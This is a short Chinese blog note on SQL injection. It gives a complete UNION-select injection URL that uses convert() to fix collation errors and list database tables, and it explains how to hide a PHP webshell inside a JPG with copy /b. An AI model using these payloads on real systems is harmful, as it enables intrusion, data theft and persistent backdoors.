sql注入记录------类型转换错误---convert()函数
Posted 晓枫v5
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入记录------类型转换错误---convert()函数相关的知识,希望对你有一定的参考价值。
sql注入在联合查询是出现一下错误查不到数据
Illegal mix of collations for operation \'UNION\'
用convert() 转换编码为utf8 或者big5 就可以了
http://10.1.2.5:52843/wcms/show.php?id=-33 union all SELECT 1,2,3,4,5,6,7,8,9,10,convert(group_concat(table_name) using big5),12,13,14,15 from information_schema.tables where table_schema=\'cms\'
2.一句话图片马
使用CMD制作一句话木马。 参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件 参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件 copy 1.jpg/b+1.php 2.jpg //意思是将1.jpg以二进制与1.php合并成2.jpg 那么2.jpg就是图片木马了。
以上是关于sql注入记录------类型转换错误---convert()函数的主要内容,如果未能解决你的问题,请参考以下文章